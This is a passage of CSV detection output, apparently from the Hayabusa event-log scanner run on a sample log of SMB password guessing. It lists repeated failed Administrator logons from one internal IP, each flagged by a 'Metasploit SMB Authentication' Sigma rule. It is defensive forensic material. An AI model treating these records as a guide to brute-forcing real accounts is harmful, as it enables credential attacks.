NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
